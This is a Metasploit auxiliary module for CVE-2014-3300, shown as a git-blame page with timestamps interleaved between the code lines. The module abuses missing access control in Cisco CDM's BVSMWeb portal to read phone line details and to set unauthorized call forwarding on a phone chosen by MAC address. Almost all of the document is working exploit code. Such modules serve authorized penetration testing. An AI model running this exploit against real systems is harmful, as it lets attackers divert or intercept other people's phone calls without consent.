2014-10-24 00:46:52 +00:00
|
|
|
##
|
2015-01-10 06:00:27 +00:00
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
2014-10-24 00:46:52 +00:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
##
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
require 'rexml/document'
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Auxiliary
|
|
|
|
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
|
2015-01-10 06:00:27 +00:00
|
|
|
def initialize(info={})
|
|
|
|
super(update_info(info,
|
|
|
|
'Name' => 'Viproy CUCDM IP Phone XML Services - Call Forwarding Tool',
|
|
|
|
'Description' => %q{
|
2015-01-10 06:02:42 +00:00
|
|
|
The BVSMWeb portal in the web framework in Cisco Unified Communications Domain Manager
|
2015-01-10 07:10:08 +00:00
|
|
|
(CDM) 10 does not properly implement access control, which allows remote attackers to
|
2015-01-26 17:00:07 +00:00
|
|
|
modify user information. This module exploits the vulnerability to configure unauthorized
|
2015-01-10 07:10:08 +00:00
|
|
|
call forwarding.
|
2015-01-10 06:00:27 +00:00
|
|
|
},
|
|
|
|
'Author' => 'fozavci',
|
|
|
|
'References' =>
|
|
|
|
[
|
|
|
|
['CVE', '2014-3300'],
|
|
|
|
['BID', '68331']
|
|
|
|
],
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
'Actions' =>
|
|
|
|
[
|
2015-01-10 06:02:42 +00:00
|
|
|
[ 'Forward', { 'Description' => 'Enabling the call forwarding for the MAC address' } ],
|
|
|
|
[ 'Info', { 'Description' => 'Retrieving the call forwarding information for the MAC address' } ]
|
2015-01-10 06:00:27 +00:00
|
|
|
],
|
|
|
|
'DefaultAction' => 'Info'
|
|
|
|
))
|
2014-10-24 00:46:52 +00:00
|
|
|
|
|
|
|
register_options(
|
2015-01-10 06:00:27 +00:00
|
|
|
[
|
|
|
|
OptString.new('TARGETURI', [ true, 'Target URI for XML services', '/bvsmweb']),
|
|
|
|
OptString.new('MAC', [ true, 'MAC Address of target phone', '000000000000']),
|
|
|
|
OptString.new('FORWARDTO', [ true, 'Number to forward all calls', '007']),
|
|
|
|
OptString.new('FINTNUMBER', [ false, 'FINTNUMBER of IP Phones, required for multiple lines'])
|
|
|
|
], self.class)
|
2014-10-24 00:46:52 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
def run
|
2015-01-10 06:27:31 +00:00
|
|
|
case action.name.upcase
|
|
|
|
when 'INFO'
|
|
|
|
get_info
|
|
|
|
when 'FORWARD'
|
|
|
|
forward_calls
|
|
|
|
end
|
|
|
|
end
|
|
|
|
|
|
|
|
def get_info
|
2014-10-24 00:46:52 +00:00
|
|
|
uri = normalize_uri(target_uri.to_s)
|
2015-01-10 06:06:26 +00:00
|
|
|
mac = datastore["MAC"]
|
2014-10-24 00:46:52 +00:00
|
|
|
|
2015-01-10 06:00:27 +00:00
|
|
|
print_status("#{peer} - Getting fintnumbers and display names of the IP phone")
|
2014-10-24 00:46:52 +00:00
|
|
|
|
|
|
|
res = send_request_cgi(
|
2015-01-10 06:27:31 +00:00
|
|
|
{
|
|
|
|
'uri' => normalize_uri(uri, 'showcallfwd.cgi'),
|
|
|
|
'method' => 'GET',
|
|
|
|
'vars_get' => {
|
|
|
|
'device' => "SEP#{mac}"
|
|
|
|
}
|
|
|
|
})
|
2014-10-24 00:46:52 +00:00
|
|
|
|
2015-01-10 06:00:27 +00:00
|
|
|
unless res && res.code == 200 && res.body && res.body.to_s =~ /fintnumber/
|
|
|
|
print_error("#{peer} - Target appears not vulnerable!")
|
2015-01-10 06:27:31 +00:00
|
|
|
print_status("#{res}")
|
|
|
|
return []
|
2015-01-10 06:00:27 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
doc = REXML::Document.new(res.body)
|
|
|
|
lines = []
|
|
|
|
fint_numbers = []
|
2014-10-24 00:46:52 +00:00
|
|
|
|
2015-01-10 06:00:27 +00:00
|
|
|
list = doc.root.get_elements('MenuItem')
|
2014-10-24 00:46:52 +00:00
|
|
|
|
2015-01-10 06:00:27 +00:00
|
|
|
list.each do |lst|
|
|
|
|
xlist = lst.get_elements('Name')
|
|
|
|
xlist.each {|l| lines << "#{l[0]}"}
|
|
|
|
xlist = lst.get_elements('URL')
|
|
|
|
xlist.each {|l| fint_numbers << "#{l[0].to_s.split('fintnumber=')[1]}" }
|
|
|
|
end
|
2014-10-24 00:46:52 +00:00
|
|
|
|
2015-01-10 06:00:27 +00:00
|
|
|
lines.size.times do |i|
|
|
|
|
print_status("#{peer} - Display Name: #{lines[i]}, Fintnumber: #{fint_numbers[i]}")
|
|
|
|
end
|
2014-10-24 00:46:52 +00:00
|
|
|
|
2015-01-10 06:27:31 +00:00
|
|
|
fint_numbers
|
|
|
|
end
|
|
|
|
|
|
|
|
def forward_calls
|
2015-01-10 06:00:27 +00:00
|
|
|
# for a specific FINTNUMBER redirection
|
2015-01-10 06:27:31 +00:00
|
|
|
uri = normalize_uri(target_uri.to_s)
|
|
|
|
forward_to = datastore["FORWARDTO"]
|
|
|
|
mac = datastore["MAC"]
|
|
|
|
|
|
|
|
if datastore['FINTNUMBER']
|
|
|
|
fint_numbers = [datastore['FINTNUMBER']]
|
|
|
|
else
|
|
|
|
fint_numbers = get_info
|
|
|
|
end
|
|
|
|
|
|
|
|
if fint_numbers.empty?
|
|
|
|
print_error("#{peer} - FINTNUMBER required to forward calls")
|
|
|
|
return
|
|
|
|
end
|
2014-10-24 00:46:52 +00:00
|
|
|
|
2015-01-10 06:27:31 +00:00
|
|
|
fint_numbers.each do |fintnumber|
|
2014-10-24 00:46:52 +00:00
|
|
|
|
2015-01-10 06:27:31 +00:00
|
|
|
print_status("#{peer} - Sending call forward request for #{fintnumber}")
|
2014-10-24 00:46:52 +00:00
|
|
|
|
2015-01-10 06:27:31 +00:00
|
|
|
send_request_cgi(
|
2015-01-10 06:00:27 +00:00
|
|
|
{
|
2015-01-10 06:27:31 +00:00
|
|
|
'uri' => normalize_uri(uri, 'phonecallfwd.cgi'),
|
|
|
|
'method' => 'GET',
|
|
|
|
'vars_get' => {
|
|
|
|
'cfoption' => 'CallForwardAll',
|
|
|
|
'device' => "SEP#{mac}",
|
|
|
|
'ProviderName' => 'NULL',
|
|
|
|
'fintnumber' => "#{fintnumber}",
|
|
|
|
'telno1' => "#{forward_to}"
|
|
|
|
}
|
2015-01-10 06:00:27 +00:00
|
|
|
})
|
|
|
|
|
2015-01-10 06:27:31 +00:00
|
|
|
res = send_request_cgi(
|
2015-01-10 06:00:27 +00:00
|
|
|
{
|
2015-01-10 06:27:31 +00:00
|
|
|
'uri' => normalize_uri(uri, 'showcallfwdperline.cgi'),
|
|
|
|
'method' => 'GET',
|
|
|
|
'vars_get' => {
|
|
|
|
'device' => "SEP#{mac}",
|
|
|
|
'fintnumber' => "#{fintnumber}"
|
|
|
|
}
|
2015-01-10 06:00:27 +00:00
|
|
|
})
|
|
|
|
|
2015-01-10 06:27:31 +00:00
|
|
|
if res && res.body && res.body && res.body.to_s =~ /CFA/
|
|
|
|
print_good("#{peer} - Call forwarded successfully for #{fintnumber}")
|
|
|
|
else
|
|
|
|
print_status("#{peer} - Call forward failed.")
|
2014-10-24 00:46:52 +00:00
|
|
|
end
|
|
|
|
end
|
|
|
|
end
|
2015-01-10 06:00:27 +00:00
|
|
|
|
2014-10-24 00:46:52 +00:00
|
|
|
end
|